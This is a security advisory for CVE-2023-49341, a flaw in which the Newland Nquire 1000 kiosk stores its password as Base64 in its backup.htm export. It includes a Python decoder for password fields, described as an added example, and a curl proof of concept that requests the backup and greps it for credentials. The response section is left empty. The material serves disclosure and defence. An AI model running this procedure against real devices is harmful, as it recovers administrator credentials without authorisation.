Newland Nquire stores passwords in a recoverable format in its backup configuration file

Nov 27, 2023

CVE Number

CVE-2023-49341

Credits

Deiby Gerez (n0obit4) of Pentraze Cybersecurity

Summary

The Newland Nquire 1000 Interactive Kiosk stores passwords in a recoverable format: the backup.htm configuration file contains the device password as a Base64-encoded string. Anyone who can obtain a backup export can trivially decode it, which poses a severe risk to the confidentiality of sensitive information within the system.

CVSS

6.5 (Medium) - CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details:

The vulnerability resides in the backup.htm configuration file, which contains the entire configuration of the device in JSON format. Inside the Miscellaneous Authentication key object there is a Password key whose value is merely Base64-encoded. Base64 is an encoding, not encryption, so it provides no real protection: the value can be decoded with any standard tool, exposing the password in a recoverable form.
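The following Python script is an added example and is not part of the original advisory or of any Newland software. It walks a backup.htm-style JSON export, finds every key named like "password", and distinguishes a recoverable value (Base64 that decodes to printable text, the defect described above) from a value that is not plaintext Base64 (for example a salted hash). The sample export, the exact nesting Miscellaneous -> Authentication -> Password, the Username key and the credential values are assumptions for this example, not output captured from a device.

```python
import base64
import binascii
import json
import sys

# Constructed sample of a backup.htm export. The nesting
# Miscellaneous -> Authentication -> Password, the Username key and the
# credential values are assumptions for this example, not device output.
SAMPLE_BACKUP = json.dumps({
    "Network": {"DHCP": True, "Hostname": "kiosk-01"},
    "Miscellaneous": {
        "Authentication": {
            "Username": "admin",
            "Password": base64.b64encode(b"Kiosk#2023").decode(),
        }
    },
})


def walk(obj, path=""):
    """Yield (dotted_path, value) for every leaf in a JSON object tree.
    Walking the whole tree avoids depending on one fixed nesting."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for idx, value in enumerate(obj):
            yield from walk(value, f"{path}[{idx}]")
    else:
        yield path, obj


def decode_if_plaintext(value):
    """Return the plaintext if `value` is Base64 that decodes to printable
    text, else None. Strict validation rejects hash strings such as "$6$...",
    and the printable check rejects Base64 that merely wraps binary data."""
    if not isinstance(value, str) or not value:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def recover_credentials(backup_text):
    """Report every password-like key in a backup export together with the
    recovered plaintext, or None when the value is not plaintext Base64."""
    findings = []
    for path, value in walk(json.loads(backup_text)):
        leaf = path.rsplit(".", 1)[-1]
        if "password" in leaf.lower():
            findings.append({
                "path": path,
                "encoded": value,
                "decoded": decode_if_plaintext(value),
            })
    return findings


if __name__ == "__main__":
    # Pipe a backup export into the script, or run it without input to
    # analyse the constructed sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_BACKUP
    for finding in recover_credentials(data):
        if finding["decoded"] is not None:
            status = f"recoverable -> {finding['decoded']!r}"
        else:
            status = "not plaintext Base64"
        print(f"{finding['path']}: {status}")
```

To use it against a real export, pipe the raw response of the backup request into the script instead of grepping it; a finding reported as "recoverable" is exactly the condition this advisory describes, while a value that fails strict Base64 validation (a hash, for instance) is not.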

POC

Script to reproduce it:

$ IP="<DEVICE IP ADDRESS>"
$ curl -s -XPOST http://$IP/backup.htm --data "action=backup" -H "Cookie: Token : 12345678" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36" | grep -iE "username|password"

Response:
